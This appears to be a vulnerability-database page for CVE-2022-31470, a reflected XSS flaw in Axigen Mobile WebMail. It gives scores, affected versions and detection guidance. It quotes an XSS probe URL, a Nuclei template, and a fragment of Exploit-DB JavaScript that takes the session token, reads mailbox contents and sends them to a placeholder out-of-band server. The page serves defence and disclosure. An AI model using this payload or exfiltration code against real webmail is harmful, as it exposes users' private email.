CVE-2022-31470
published 2022-06-07CVE-2022-31470: An XSS vulnerability in the index_mobile_changepass.hsp reset-password section of Axigen Mobile WebMail before 10.2.3.12 and 10.3.x before 10.3.3.47 allows…
PriorityP355medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
52.09%
98.8th percentile
An XSS vulnerability in the index_mobile_changepass.hsp reset-password section of Axigen Mobile WebMail before 10.2.3.12 and 10.3.x before 10.3.3.47 allows attackers to run arbitrary Javascript code that, using an active end-user session (for a logged-in user), can access and retrieve mailbox content.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| axigen | axigen_mobile_webmail | >= 10.2.2.0 < 10.2.3.12 | 10.2.3.12 |
| axigen | axigen_mobile_webmail | >= 10.3.3.0 < 10.3.3.47 | 10.3.3.47 |
Detection & IOCsextracted from sources · hover to see the quote
yara
id: CVE-2022-31470 info: name: Axigen WebMail - Cross-Site Scripting author: AmirZargham severity: medium
- →Detect XSS probe against Axigen WebMail by looking for the reflected payload 'alert(document.domain)' in HTTP responses to requests targeting /index.hsp with the 'm' parameter. ↗
- →Fingerprint Axigen WebMail instances via Shodan/FOFA using the title 'Axigen' before probing for the vulnerability. ↗
- →Confirm Axigen WebMail presence by checking HTTP response body for the strings 'Axigen WebMail', 'AXI-SCRIPT', 'axigen-web-fonts', or 'AXIWMRememberLogin' before exploitation. ↗
- →Exfiltration of mailbox content is performed by appending a dynamically created script tag whose src points to an out-of-band server with base64-encoded email data as a query parameter. ↗
- →The nuclei template uses a two-step flow: first confirm the Axigen WebMail login page, then send the XSS probe to /index.hsp?m=<script>alert(document.domain)</script> and check for reflection in a text/html 200 response. ↗
- ·The vulnerability affects Axigen Mobile WebMail before 10.2.3.12 and 10.3.x before 10.3.3.47; the nuclei template also references versions up to 10.5.0-4370c946, suggesting a broader affected range than the original NVD advisory. ↗
- ·The exploit requires an active authenticated end-user session to access and retrieve mailbox content; unauthenticated exploitation is limited to reflected XSS delivery. ↗
- ·The exploit code references an external out-of-band (OOB) server variable '${oob_server}' for data exfiltration; defenders should monitor for unusual outbound script-tag src requests from webmail sessions. ↗
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Axigen < 10.3.3.47_ 10.2.3.12 - Reflected XSS
exploitdb·2023-09-08·CVSS 6.1
CVE-2022-31470 [MEDIUM] Axigen < 10.3.3.47_ 10.2.3.12 - Reflected XSS
Axigen {
if (xhr1.readyState === XMLHttpRequest.DONE) {
_h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
true);
xhr2.setRequestHeader('Content-Type', 'application/json');
xhr2.onreadystatechange = () => {
if (xhr2.readyState === XMLHttpRequest.DONE) {
if (xhr2.status === 401){
script_tag.src =
`${oob_server}?status=session_expired&domain=${document.domain}`;
document.body.appendChild(script_tag);
} else {
resp = xhr2.responseText;
folderId = JSON.parse(resp)["mails"][0]["folderId"];
xhr3.open('GET',
`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
xhr3.onreadystatechange = () => {
if (xhr3.readyState === XMLHttpRequest.DONE) {
emails = xhr3.responseText;
script_tag.src =
`${oob_server}?status=ok&
Nuclei
Axigen WebMail - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2022-31470 [MEDIUM] Axigen WebMail - Cross-Site Scripting
Axigen WebMail - Cross-Site Scripting
Axigen WebMail versions 10.5.0-4370c946 and older are vulnerable to reflected XSS via the m parameter in the /index.hsp endpoint.
Template:
id: CVE-2022-31470
info:
name: Axigen WebMail - Cross-Site Scripting
author: AmirZargham
severity: medium
description: |
Axigen WebMail versions 10.5.0-4370c946 and older are vulnerable to reflected XSS via the m parameter in the /index.hsp endpoint.
impact: |
Attackers can craft malicious URLs with JavaScript in the m parameter that executes when users access the link, potentially stealing session cookies, credentials, or performing unauthorized actions in the victim's Axigen WebMail account.
remediation: |
Update Axigen WebMail to a version later than 10.5.0-4370c946 that properly sanitizes and encodes the m
No writeups or analysis indexed.
http://packetstormsecurity.com/files/174551/Axigen-10.5.0-4370c946-Cross-Site-Scripting.htmlhttps://axigen.comhttps://www.axigen.com/knowledgebase/Axigen-Mobile-WebMail-XSS-Vulnerability-CVE-2022-31470-_390.htmlhttp://packetstormsecurity.com/files/174551/Axigen-10.5.0-4370c946-Cross-Site-Scripting.htmlhttps://axigen.comhttps://www.axigen.com/knowledgebase/Axigen-Mobile-WebMail-XSS-Vulnerability-CVE-2022-31470-_390.html
2022-06-07
Published